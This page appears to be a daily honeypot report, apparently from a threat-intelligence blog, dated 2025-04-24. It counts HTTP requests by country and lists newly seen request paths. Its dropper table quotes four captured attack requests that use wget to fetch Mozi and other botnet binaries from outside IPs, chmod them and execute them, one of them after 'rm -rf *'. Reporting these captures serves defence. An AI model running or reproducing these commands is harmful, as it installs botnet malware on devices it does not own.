Skip to main content
  1. Daily-Posts/

Report: 2025-04-24

·358 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-24
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 10 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1994 requests were recorded during the day, originating from 4 different countries, with a peak of 496 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
GBGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
139.5.10.7527;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
124.220.11.157GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11
8.152.208.190GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.90.162.234/wdjkalwww/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5 HTTP/1.1
5.183.209.244POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F212.18.104.182%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
316POST /show HTTP/1.1
1592GET /admin.php?520 HTTP/1.1
2141GET /pmd/index.php HTTP/1.1
2231POST /api/v1/validate/code HTTP/1.1
2331GET /odinhttpcall1745486121 HTTP/1.1
2341GET /OdinHttpCall1745486121 HTTP/1.1
2351GET /Odin/http/call1745486121 HTTP/1.1
3071GET /OdinHttpCall1745523802 HTTP/1.1
3081GET /Odin/http/call1745523802 HTTP/1.1
3381GET /odinhttpcall1745523802 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0496GB
1344NL
2307US
3154SC
4132BG
5101DE
694PL
761KR
845CN
937RU
1034HK
1123IN
1215SG
1315CA
1412CH
1511ZA
1611AU
1710AO
1810TR
199VN
208BE
217FR
226LT
236SE
246IL
255BR
264MD
274KW
283GH
293IT
303PT
312IR
322VE
332ID
342JP
352UA
361CZ
371AE
381PH
391AL
401RO
411NP
421AR
431PA

Related

Report: 2025-04-23
·512 words
Repport Daily
Report: 2025-04-22
·410 words
Repport Daily
Report: 2025-04-21
·30388 words
Repport Daily